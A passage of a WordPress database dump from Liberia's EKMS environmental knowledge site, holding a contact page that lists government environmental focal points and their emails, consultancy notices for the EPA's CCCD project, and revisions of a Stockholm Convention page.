website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:jduolupeh@gmail.com\">jduolupeh@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA<br /><a href=\"&quot;mailto:stephenlavalah@yahoo.com\">stephenlavalah@yahoo.com</a></p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/sherman-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/borbor-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />Finance &amp; Administrative Officer<br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/simpson-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Henry A. Simpson </strong><br />Weather Forecaster<br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/domah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />Administrative Assistant, Office of the Minister<br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel G. Ballah </strong><br />MGCSP<br /><a href=\"mailto:emmanuelgballah_@gmail.com\">emmanuelgballah_@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-04-06 09:10:18','2021-04-06 09:10:18','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3673,42,'2021-04-06 14:49:48','2021-04-06 14:49:48','The EPA and the UNDP through the Cross-Cutting Capacity Development Project intends to recruit the service of a\r\nNational Consultant, to: Prepare a training Programme and curriculum for the use of the EKMS. This project is in line\r\nwith the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs\r\ninto management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and\r\nregulatory frameworks, and c) update NCSAs, respectively.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2021/04/FINAL-DRAFT-EKMS-CURRICULUM-MARCH-19-2021-CCCD.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">EPA Seeks Local Consultant to Prepare a Training Programme and Curriculum</a></em>','REFRENCE NO: TOR/CCCD/EPA-2021-003, Prepare a Training Programme and Curriculum for The Use of The EKMS Post Project Trainings','','publish','closed','closed','','refrence-no-tor-cccd-epa-2021-003-prepare-a-training-programme-and-curriculum-for-the-use-of-the-ekms-post-project-trainings','','','2021-08-19 08:58:04','2021-08-19 08:58:04','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=3673',119,'ekms_bulletin','',0),(3674,42,'2021-04-06 15:00:09','2021-04-06 15:00:09','The objective of the consultancy is to identify and summarize lessons learned study from the\r\nuse of the EKMS to mainstream Rio Convention obligations into sectorial plans and policies\r\nsince it was designed and piloted from December 2019.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2021/04/FINAL-DRAFT-LESSONS-LEARNED-TOR-MARCH-19-2021-CCCD.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">EPA Seeks Local Consultant to Prepare Lessons Learned</a></em>','REFRENCE NO: TOR/CCCD/EPA-2021-002, Prepare Lessons Learned Study on the Use of the EKMS to Mainstream Rio Convention Obligations Into Sectoral Plans and Policies','','publish','closed','closed','','refrence-no-tor-cccd-epa-2021-002-prepare-lessons-learned-study-on-the-use-of-the-ekms-to-mainstream-rio-convention-obligations-into-sectoral-plans-and-policies','','','2021-08-19 08:57:09','2021-08-19 08:57:09','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=3674',118,'ekms_bulletin','',0),(3675,42,'2021-04-06 15:25:16','2021-04-06 15:25:16','The EPA as Implementing Entity (IE) in collaboration with the UNDP intends to recruit the service of a National Consultant, to Prepare and validate the methodology to update the 2006 NCSA and integrate the post-2015 SDGs. This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively. The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.\r\n\r\nLink: <em><a href=\"https://emansion.gov.lr/doc/JOB%20OPPORTUNITY%20EPA%203.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">EPA Seeks Local Consultant to Prepare and Validate the Methodology to Update the NCSA </a></em>','REFRENCE NO: TOR/CCCD/EPA-2021-001, Prepare and Validate the Methodology to Update the NCSA and Integrate the Post-2015 SDGs','','publish','closed','closed','','refrence-no-tor-cccd-epa-2021-001-prepare-and-validate-the-methodology-to-update-the-ncsa-and-integrate-the-post-2015-sdgs','','','2021-08-19 08:56:06','2021-08-19 08:56:06','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=3675',117,'ekms_bulletin','',0),(3679,42,'2021-04-08 10:28:58','2021-04-08 10:28:58','','FINAL DRAFT NCSA METHODOLOGY UPDATE TORS MARCH 19, 2021 (CCCD)','','inherit','open','closed','','final-draft-ncsa-methodology-update-tors-march-19-2021-cccd','','','2021-04-08 10:28:58','2021-04-08 10:28:58','',0,'https://ekmsliberia.info/wp-content/uploads/2021/04/FINAL-DRAFT-NCSA-METHODOLOGY-UPDATE-TORS-MARCH-19-2021-CCCD.pdf',0,'attachment','application/pdf',0),(3680,42,'2021-05-29 10:34:23','2021-05-29 10:34:23','The EPA through the CCCD Project in collaboration with the United National Development\r\nProgram (UNDP) intends to hire a National Consultant to harmonize and strengthen the EPA Act for amendment by\r\nthe Legislature. Considering the above, the EPA through the Cross-Cutting Capacity Project requests the services of\r\na National Consultant to work with the CCCD Project in collaboration with the EPA in achieving this objective.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2021/04/FINAL-DRAFT-EPA-ACT-HARMONIZATION-MARCH-19-2021-CCCD.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">EPA seeks Local Consultant to Review and Provide Harmonization Proposals for Amendment for EPA Act</a></em>','REFRENCE NO: TOR/CCCD/EPA-2021-001, Review and Provide Harmonization Proposals for  Amendment of the EPA Act by the Legislature','','publish','closed','closed','','refrence-no-tor-cccd-epa-2021-001-undertake-a-review-of-the-swot-and-gap-analysis','','','2021-08-19 08:54:33','2021-08-19 08:54:33','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=3680',116,'ekms_bulletin','',0),(3681,42,'2021-04-08 10:31:34','2021-04-08 10:31:34','','FINAL DRAFT EPA ACT HARMONIZATION MARCH 19, 2021 (CCCD)','','inherit','open','closed','','final-draft-epa-act-harmonization-march-19-2021-cccd','','','2021-04-08 10:31:34','2021-04-08 10:31:34','',0,'https://ekmsliberia.info/wp-content/uploads/2021/04/FINAL-DRAFT-EPA-ACT-HARMONIZATION-MARCH-19-2021-CCCD.pdf',0,'attachment','application/pdf',0),(3682,42,'2021-04-08 10:41:41','2021-04-08 10:41:41','','FINAL DRAFT EKMS CURRICULUM MARCH 19, 2021 (CCCD)','','inherit','open','closed','','final-draft-ekms-curriculum-march-19-2021-cccd','','','2021-04-08 10:41:41','2021-04-08 10:41:41','',0,'https://ekmsliberia.info/wp-content/uploads/2021/04/FINAL-DRAFT-EKMS-CURRICULUM-MARCH-19-2021-CCCD.pdf',0,'attachment','application/pdf',0),(3683,42,'2021-04-08 10:42:03','2021-04-08 10:42:03','','FINAL DRAFT LESSONS LEARNED TOR MARCH 19, 2021 (CCCD)','','inherit','open','closed','','final-draft-lessons-learned-tor-march-19-2021-cccd','','','2021-04-08 10:42:03','2021-04-08 10:42:03','',0,'https://ekmsliberia.info/wp-content/uploads/2021/04/FINAL-DRAFT-LESSONS-LEARNED-TOR-MARCH-19-2021-CCCD.pdf',0,'attachment','application/pdf',0),(3684,42,'2021-04-08 10:58:26','2021-04-08 10:58:26','The EPA through the CCCD Project in collaboration with the United National Development\nProgram (UNDP) intends to hire a National Consultant to harmonize and strengthen the EPA Act for amendment by\nthe Legislature. Considering the above, the EPA through the Cross-Cutting Capacity Project requests the services of\na National Consultant to work with the CCCD Project in collaboration with the EPA in achieving this objective.\n\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2021/04/FINAL-DRAFT-EPA-ACT-HARMONIZATION-MARCH-19-2021-CCCD.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">EPA seeks Local Consultant to Review SWOT and GAP Analysis</a></em>','REFRENCE NO: TOR/CCCD/EPA-2021-001, Review and Provide Harmonization Proposals for  Amendment of the EPA Act by the Legislature','','inherit','closed','closed','','3680-autosave-v1','','','2021-04-08 10:58:26','2021-04-08 10:58:26','',3680,'https://ekmsliberia.info/3680-autosave-v1/',0,'revision','',0),(3685,42,'2021-04-12 11:03:48','2021-04-12 11:03:48','The Stockholm Convention is multilateral environmental agreement to protect human health and the environment from chemicals known as POPs. Liberia acceded to this convention in 2002 and in fulfilment of the country’s obligation under Article 7 of the Convention, Liberia prepared its national implementation plan (NIP) in 2006 and updated the NIP in 2014. National priorities identified in the two versions of the NIP are yet to be implemented due to lack of funding. Liberia participated in many enabling projects covering awareness, training of custom officers and conduct of chemical inventory in four counties including Bomi, Margibi, Grand Bassa and Montserrado Counties.\r\n\r\nThe two active projects operating under the convention are Lead Paint Law and AFLDC-2. The Lead Paint Law Project is a national initiative and does not have external support. Since the Environmental Protection and Management Law of Liberia has a provision of lead in paint, we are developing regulation instead of law. The AFLDC-2 is a GEF funded Project that is over $2,000,000.00. It was already approved but implementation is at a standstill due to the current COVID pandemic.\r\n\r\nNational Focal Point\r\n\r\nJerry T. Toe Sr is the National Focal Point for the Stockholm Convention on Persistent Organic Pollutants. He earned MSc in Organic Chemistry from the Beijing University of Chemical Technology. He also holds a BSc degree in Pharmacology (B-Pharm) and Bachelor of Science Degree in General Chemistry in from the University of Liberia\r\n\r\nMr. Toe joined EPA family in 2010 as Industry and Remediation Analyst. He later served as Manager of the Department of Compliance and Enforce for five consecutive years. His goal is to collaborate with the Environmental Research and Standards Unit for the establishment a chemical regulatory body known as National Inter-Sectoral committee on Chemical Management (NICCM).','Stockholm Convention','','inherit','closed','closed','','3664-revision-v1','','','2021-04-12 11:03:48','2021-04-12 11:03:48','',3664,'https://ekmsliberia.info/3664-revision-v1/',0,'revision','',0),(3687,42,'2021-04-12 13:50:52','2021-04-12 13:50:52','The Stockholm Convention is multilateral environmental agreement to protect human health and the environment from chemicals known as POPs. Liberia acceded to this convention in 2002 and in fulfilment of the country’s obligation under Article 7 of the Convention, Liberia prepared its national implementation plan (NIP) in 2006 and updated the NIP in 2014. National priorities identified in the two versions of the NIP are yet to be implemented due to lack of funding. Liberia participated in many enabling projects covering awareness, training of custom officers and conduct of chemical inventory in four counties including Bomi, Margibi, Grand Bassa and Montserrado Counties.\n\nThe two active projects operating under the convention are Lead Paint Law and AFLDC-2. The Lead Paint Law Project is a national initiative and does not have external support. Since the Environmental Protection and Management Law of Liberia has a provision of lead in paint, we are developing regulation instead of law. The AFLDC-2 is a GEF funded Project that is over $2,000,000.00. It was already approved but implementation is at a standstill due to the current COVID pandemic.\n\nNational Focal Point\n\nJerry T. Toe Sr is the National Focal Point for the Stockholm Convention on Persistent Organic Pollutants. He earned MSc in Organic Chemistry from the Beijing University of Chemical Technology. He also holds a BSc degree in Pharmacology (B-Pharm) and Bachelor of Science Degree in General Chemistry in from the University of Liberia\n\nMr. Toe joined EPA family in 2010 as Industry and Remediation Analyst. He later served as Manager of the Department of Compliance and Enforce for five consecutive years. His goal is to collaborate with the Environmental Research and Standards Unit for the establishment a chemical regulatory body known as National Inter-Sectoral committee on Chemical Management (NICCM).','Stockholm Convention on Persistent','','inherit','closed','closed','','3664-autosave-v1','','','2021-04-12 13:50:52','2021-04-12 13:50:52','',3664,'https://ekmsliberia.info/3664-autosave-v1/',0,'revision','',0),(3688,42,'2021-04-12 13:48:07','2021-04-12 13:48:07','','Stockholm','','inherit','open','closed','','untitled','','','2021-04-12 13:48:18','2021-04-12 13:48:18','',3664,'https://ekmsliberia.info/wp-content/uploads/2021/04/Untitled.png',0,'attachment','image/png',0),(3689,42,'2021-04-12 13:51:08','2021-04-12 13:51:08','The Stockholm Convention is multilateral environmental agreement to protect human health and the environment from chemicals known as POPs. Liberia acceded to this convention in 2002 and in fulfilment of the country’s obligation under Article 7 of the Convention, Liberia prepared its national implementation plan (NIP) in 2006 and updated the NIP in 2014. National priorities identified in the two versions of the NIP are yet to be implemented due to lack of funding. Liberia participated in many enabling projects covering awareness, training of custom officers and conduct of chemical inventory in four counties including Bomi, Margibi, Grand Bassa and Montserrado Counties.\r\n\r\nThe two active projects operating under the convention are Lead Paint Law and AFLDC-2. The Lead Paint Law Project is a national initiative and does not have external support. Since the Environmental Protection and Management Law of Liberia has a provision of lead in paint, we are developing regulation instead of law. The AFLDC-2 is a GEF funded Project that is over $2,000,000.00. It was already approved but implementation is at a standstill due to the current COVID pandemic.\r\n\r\nNational Focal Point\r\n\r\nJerry T. Toe Sr is the National Focal Point for the Stockholm Convention on Persistent Organic Pollutants. He earned MSc in Organic Chemistry from the Beijing University of Chemical Technology. He also holds a BSc degree in Pharmacology (B-Pharm) and Bachelor of Science Degree in General Chemistry in from the University of Liberia\r\n\r\nMr. Toe joined EPA family in 2010 as Industry and Remediation Analyst. He later served as Manager of the Department of Compliance and Enforce for five consecutive years. His goal is to collaborate with the Environmental Research and Standards Unit for the establishment a chemical regulatory body known as National Inter-Sectoral committee on Chemical Management (NICCM).','Stockholm Convention on Persistent Organic Pollutants','','inherit','closed','closed','','3664-revision-v1','','','2021-04-12 